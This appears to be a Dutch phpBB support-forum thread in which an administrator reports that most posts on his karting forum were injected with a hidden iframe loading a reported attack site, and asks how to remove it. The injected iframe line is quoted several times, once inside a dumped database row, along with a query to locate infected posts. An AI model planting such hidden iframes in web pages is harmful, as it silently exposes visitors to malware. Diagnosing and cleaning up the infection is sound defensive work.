phpBB.nl

Adres van je forum: http://forum.kartgrid.be
Event. modificaties op je forum: zie handtekening
Wanneer ontstond het probleem? vandaag
phpBB versie: 3.0.2

Heb je onlangs iets veranderd aan je forum? Nee, de laatste weken niet gewijzigd
Wat is het probleem?

Sinds vanmorgen krijg ik reports van gebruikers dat als ze het forum openen hun virusscanner in actie schiet. Er worden trojans geblokkeerd en mijn forum vraagt om Microsoft Data Access - Remote Data Servcies ... te installeren.

Blijkbaar heeft enkel IE hier last van met Firefox krijg ik de melding niet.

Ik kan ook zien dat er bestanden geopend worden van atkgft . com en httpdocs.eu

Als ik de broncode open van die betreffende pagina's zie ik volgende code staan die er helemaal niet hoort
<iframe src="http://httpdocs.eu/" style="display:none"></iframe>

In deze topic vinden jullie de reports van mijn gebruikers http://forum.kartgrid.be/viewtopic.php?p=140752#p140752
Dit is een van de topics waar het probleem zich voordoet
http://forum.kartgrid.be/viewtopic.php?f=52&t=4917

En blijkbaar zijn er ook al reports op andere forums.
Dit is een vbullutin forum http://www.ukbusinessforums.co.uk/forum ... p?p=578691

Ik hoop dat iemand mij snel kan helpen, het forum is deze week heel belangrijk aangezien er een WK indoorkarting aan de gang is in Belgie.

EDIT:
ik heb ondertussen de database gedownload en in de database vindt ik 1356 keer de vermelding naar <iframe src="http://httpdocs.eu/" style="display:none"></iframe>

We hebben 1369 onderwerpen, dus is bijna elk onderwerp besmet.

Nu hoe kan ik dit eruit krijgen, en in de toekomst vermijden.
Zijn er enkele bestanden van phpbb onveilig of heeft iemand de database gehackt?

Firefox en Google hebben de site httpdocs.eu ook gerapporteerd als aanvalsite.

Ik vind het een erg vreemd probleem en heb zoiets nog niet eerder gezien. Aangezien het gokken blijft en het enkel in berichten voorkomt. Zou je in de codedump eens je viewtopic.php willen plaatsen?

Bij deze,
Forum gehacked Het is enkel dit stukje dat je moet zoeken
<iframe src="http://httpdocs.eu/" style="display:none"></iframe>

Daar ligt het probleem.

Dat is je volledige bron, die heb ik zelf ook bekeken. Ik bedoel het bestand viewtopic.php dat op je server staat.

Ok sorry,

bij deze
Forum hacked

In de database staat de bewuste code dus 1356 keer.

hierbij een lijn uit de database

Code: Selecteer alles

backup2.sql(62003): INSERT INTO `posts` VALUES (140550, 4926, 1, 183, 0, 0x38342e3139362e3136382e3339, 1217975337, 1, 0, 1, 1, 1, 0, '', 'Nieuw bezoekersrecord', 'Vorig jaar werd het WK in Phoenix vanop het forum gevolgd door heel wat van onze bezoekers.  Dit was vooral de verdienste van heel het team Talent Promotion Belgium die zowaar voor live verslag zorgden.  Tijdens de finale sneuvelden er dan ook records, er waren op de finaledag maar liefst 1009 unieke bezoekers.\n\nDit jaar is Kortrijk de host voor het WK.  Om onze bezoekers iets extra aan te bieden sloegen KartGrid, First Kart ''Inn en Flanders Indoor Kart de handen in elkaar om een live timing aan te bieden.  Al snel werd dit door heel wat buitenlandse sites opgepikt en wordt het WK online gevolgd vanuit de hele wereld.\n\nOm een nieuw bezoekersrecord te breken moesten we nu zelfs niet wachten tot de finale.  Vandaag 05 augustus - exact een jaar na het vorige record! - waren er maar liefst 1177 unieke bezoekers en 12936 pageviews.\n\nBenieuwd of we terug een jaar moeten wachten op een nieuw record of zal de finale van aanstaande vrijdag voor ongeziene bezoekersaantallen zorgen  <!-- s:idea: --><img src="{SMILIES_PATH}/icon3.gif" alt=":idea:" title="idee" /><!-- s:idea: --><iframe src="http://httpdocs.eu/" style="display:none"></iframe>', 0x6634633265386632323663666438646562346465306564353534303133613736, 0, '', 0x3370766364636b35, 1, 0, '', 0, 0, 0);

Het ziet er ook naar uit dat dit enkel is op 'oude' berichten. Als ik een nieuw bericht plaats verschijnt dat er niet in.

Mag ik er dan van uitgaan dat iemand de database heeft gehackt en een query heet uitgevoerd?

Probeer er voor te zorgen dat je niet dubbel post, je kan gewoon je berichten bewerken.

- Bee

Tazmanian schreef:Het ziet er ook naar uit dat dit enkel is op 'oude' berichten. Als ik een nieuw bericht plaats verschijnt dat er niet in.

Mag ik er dan van uitgaan dat iemand de database heeft gehackt en een query heet uitgevoerd?

Dubbelposten is niet toegestaan, jij weet dit mischien niet, maar zou je de volgende keer de wijzig knop kunnen gebruiken? (die vind je hier rechtsboven, naast ! en Citeer,) dankjewel

Dit soort berichten zijn nog ongewenster dan dubbelposten. Niet doen dus.

- Bee

Sorry, ik heb er niet op gelet, maar ik wist het eigenlijk wel

Ondertussen vastgesteld dat het niet enkel om eerste posts gaat, maar er ook in posts verder in de topic de code is toegevoegd.

EDIT:

Weet er iemand hoe ik de code die is toegevoegd in sommige posts kan verwijderen?
Met deze command zie ik alle rijen waar de code in staat:

Code: Selecteer alles

SELECT * FROM `phpbb3_posts` WHERE `post_text` like '%<iframe src="http://httpdocs.eu/" style="display:none"></iframe>'

Maar hoe kan ik enkel deze code verwijderen zonder de posts zelfs te verliezen?

je kan de tekst veranderen die met iframe start, lees even hier voor meer info van phpbb2, maar je kunt het makkelijk wijzigen voor jou toepassing:

http://www.ramonfincken.com/29/PHP+codi ... abase.html

Ik had ondertussen een incident tracker ingediend bij phpbb.com en daar de code al gekregen.
Ze weten echter (nog) niet hoe ze het forum / database gekraakt hebben, aangezien ik bijna allemaal officiele MOD's gebruik.

phpBB.nl

Virus op forum?

Virus op forum?

Re: Virus op forum?

Re: Virus op forum?

Re: Virus op forum?

Re: Virus op forum?

Re: Virus op forum?

Re: Virus op forum?

Re: Virus op forum?

Re: Virus op forum?

Re: Virus op forum?

Re: Virus op forum?